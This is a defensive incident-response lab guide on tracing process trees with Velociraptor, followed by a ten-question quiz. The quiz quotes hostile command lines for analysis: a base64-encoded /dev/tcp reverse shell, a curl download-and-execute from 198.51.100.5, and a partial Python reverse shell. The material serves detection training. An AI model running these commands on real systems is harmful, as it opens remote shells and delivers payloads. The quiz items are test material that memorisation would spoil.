What You'll Learn
- Trace parent-child process relationships using Velociraptor to reconstruct execution chains
- Identify suspicious process lineage patterns (e.g., web server spawning shell, shell spawning recon tools)
- Analyze command-line arguments, user context, and working directories for each process in a chain
- Determine whether a suspicious execution chain is malicious or benign based on forensic evidence
- Document a complete process tree analysis with a verdict and supporting evidence
Lab Overview
| Detail | Value |
|---|---|
| Lab Profile | lab-velociraptor |
| Containers | Velociraptor Server, Velociraptor Client |
| Estimated Time | 50 minutes |
| Difficulty | Intermediate |
| Browser Access | Velociraptor GUI (port 8889) |
| Pre-Loaded Data | Suspicious execution chain planted on Linux client |
| Deliverable | Process tree analysis document with malicious/benign verdict |
Why Process Trees Matter. A single suspicious process tells you very little. But when you see that apache2 spawned /bin/bash, which spawned whoami, then cat /etc/passwd, then wget — you're looking at a web shell exploitation chain. Process tree analysis is how SOC analysts reconstruct the full story of an attack from the endpoint's perspective.
The Scenario
Your Tier 1 analyst escalated an alert: a suspicious curl command was observed executing on the endpoint velociraptor-client. The alert only shows the single process — but you need to understand the full context:
- What launched this process? (parent process)
- What did this process launch? (child processes)
- What user ran it? (privilege context)
- What was the full command line? (intent)
A suspicious execution chain has been planted on the client. Your job is to trace the entire tree — from the initial trigger to the final payload — and determine whether the activity is malicious.
Part 1: Initial Process Investigation
Step 1: Log Into Velociraptor
- URL: Provided via the "Open Lab" button (port 8889)
- Username:
admin - Password:
cyberblue
Navigate to the connected client.
Step 2: Collect the Full Process Tree
- Click "Collected Artifacts" → "New Collection"
- Search for and select:
Linux.Sys.Pslist - Launch the collection
Step 3: Find the Suspicious Process
In the results, look for processes that stand out:
- Processes running from unusual paths (
/tmp/,/dev/shm/, hidden directories) - Processes with suspicious command-line arguments (
curl,wget,base64,nc,ncat) - Processes running as unexpected users (web server user running system tools)
Record the PID of the first suspicious process you find.
Part 2: Tracing the Parent Chain
Step 4: Identify the Parent Process
For the suspicious process you found, locate its Parent PID (PPID). Find that parent in the process listing.
Document the chain upward:
PARENT CHAIN (bottom to top)
════════════════════════════
Level 0: [suspicious process] (PID: [x], PPID: [y])
Command: [full command line]
User: [username]
Path: [binary path]
Level 1: [parent process] (PID: [y], PPID: [z])
Command: [full command line]
User: [username]
Path: [binary path]
Level 2: [grandparent process] (PID: [z], PPID: [w])
Command: [full command line]
User: [username]
Path: [binary path]
Step 5: Evaluate the Parent Chain
For each level, ask:
- Is this parent-child relationship normal? (e.g.,
systemd→sshdis normal;apache2→/bin/bashis NOT) - Does the user context change between levels? (privilege escalation indicator)
- Does the working directory make sense for this process?
Legitimate vs. Suspicious Parent Chains. Normal: systemd → sshd → bash → user_command. Suspicious: apache2 → sh → curl → bash. The key question is: "Would this parent process EVER legitimately spawn this child?" If a web server spawns a shell, that's almost always exploitation.
Part 3: Tracing the Child Chain
Step 6: Find Child Processes
Now look DOWNWARD from your suspicious process. Find all processes whose PPID matches your suspicious process's PID.
Document the children:
CHILD CHAIN (top to bottom)
═══════════════════════════
Root: [suspicious process] (PID: [x])
Child 1: [process] (PID: [a], PPID: [x])
Command: [full command line]
Purpose: [what is this doing?]
Child 2: [process] (PID: [b], PPID: [x])
Command: [full command line]
Purpose: [what is this doing?]
Child 3: [process] (PID: [c], PPID: [x])
Command: [full command line]
Purpose: [what is this doing?]
Step 7: Classify Child Activities
Categorize each child process:
| Category | Examples | Significance |
|---|---|---|
| Reconnaissance | whoami, id, uname -a, ifconfig | Attacker learning about the system |
| Credential Access | cat /etc/shadow, cat /etc/passwd | Attempting to steal credentials |
| Persistence | crontab -e, writing to .bashrc | Ensuring continued access |
| Lateral Movement | ssh, scp, network scanning | Moving to other systems |
| Data Exfiltration | curl, wget to external IPs | Stealing data |
| Payload Deployment | chmod +x, executing downloaded files | Installing malware |
Part 4: Command-Line Analysis
Step 8: Decode Command-Line Arguments
For each process in your tree, examine the full command line carefully:
- Are there base64-encoded strings? (decode them)
- Are there IP addresses or URLs? (are they external?)
- Are there file paths being read or written? (sensitive files?)
- Are there piped commands? (chaining multiple operations)
COMMAND-LINE ANALYSIS
═════════════════════
Process: [name] (PID: [x])
Full Command: [complete command line]
Decoded/Interpreted:
- [what each argument/flag does]
- [any encoded strings decoded]
- [network destinations identified]
- [files accessed or modified]
Step 9: Timeline Reconstruction
Using process start times, arrange the entire execution chain chronologically:
EXECUTION TIMELINE
══════════════════
[T+0s] [process] launched by [parent] — [action description]
[T+1s] [process] launched by [parent] — [action description]
[T+3s] [process] launched by [parent] — [action description]
[T+5s] [process] launched by [parent] — [action description]
Timing Tells a Story. If child processes spawn within seconds of each other in a reconnaissance → escalation → persistence pattern, it's almost certainly automated exploitation (a script or exploit payload). If there are minutes between actions, it may be a human operator working interactively.
Part 5: Verdict and Report
Step 10: Make Your Determination
Based on all evidence, complete the final analysis:
PROCESS TREE INVESTIGATION REPORT
══════════════════════════════════
Endpoint: [hostname]
Investigation Date: [today's date]
Analyst: [your name]
VERDICT: [MALICIOUS / BENIGN / INCONCLUSIVE]
Confidence: [High / Medium / Low]
EVIDENCE SUMMARY
────────────────
1. Process origin: [legitimate service / suspicious path]
2. Parent chain: [normal hierarchy / abnormal spawning]
3. Child activities: [categories observed]
4. Command lines: [suspicious indicators found]
5. Timing pattern: [automated / manual / normal]
6. User context: [appropriate / escalated / service account abuse]
FULL PROCESS TREE
─────────────────
[grandparent]
└─ [parent]
└─ [suspicious process] ← INVESTIGATION START
├─ [child 1] — [classification]
├─ [child 2] — [classification]
└─ [child 3] — [classification]
RECOMMENDATIONS
───────────────
1. [Immediate action]
2. [Follow-up investigation]
3. [Prevention measure]
Deliverable Checklist
Before completing the lab, ensure you have:
- Parent Chain — traced upward from suspicious process to init/systemd
- Child Chain — identified all child processes and their purposes
- Command-Line Analysis — decoded and interpreted all command arguments
- Execution Timeline — chronological reconstruction of the attack chain
- Verdict Document — malicious/benign determination with supporting evidence
Key Takeaways
- Process tree analysis reconstructs the full story of an attack from a single suspicious indicator
- Parent-child relationships reveal HOW a process was launched — legitimate service chains vs. exploitation
- Command-line arguments contain the attacker's intent — IPs, encoded payloads, file targets
- Timing patterns distinguish automated exploitation (seconds) from interactive operations (minutes)
- The verdict must be supported by multiple evidence points, not a single indicator
What's Next
In Lab 8.3 — Persistence Hunt, you'll systematically search an endpoint for all persistence mechanisms an attacker may have installed. Instead of tracing one execution chain, you'll sweep every common persistence location — cron, systemd, SSH keys, shell configs, and more.
Lab Challenge: Process Tree Investigation
10 questions · 70% to pass
You find a suspicious process with PID 4521. Its PPID is 3892. What does this tell you about the process relationship?
You see this process chain: apache2 → /bin/sh → whoami. Why is this parent-child relationship suspicious?
A process has the command line: '/bin/bash -c echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4wLjAuMS80NDQ1 | base64 -d | bash'. What technique is the attacker using?
You observe that three child processes spawned within 0.5 seconds of each other in sequence: whoami → cat /etc/passwd → curl http://external-ip/payload. What does the timing pattern suggest?
In a process tree, the suspicious process runs as user 'www-data' but its child process runs as 'root'. What does this user context change indicate?
You're analyzing command-line arguments and see: 'curl -s -o /tmp/.x http://198.51.100.5/stage2 && chmod +x /tmp/.x && /tmp/.x'. What three actions does this command perform?
When building a process tree, you find that the grandparent process (PID 1) is 'systemd'. Does this make the tree less suspicious?
You see a child process with the command: 'python3 -c import socket,subprocess,os;s=socket.socket()...'. What type of malicious activity is this?
Your investigation reveals a process tree where ALL processes are running from /usr/bin/ or /usr/sbin/ with expected parent chains, but one process has an unusual command-line argument. Should your verdict be MALICIOUS?
After completing your process tree analysis, what is the MOST important element to include in your investigation report for other analysts?
0/10 answered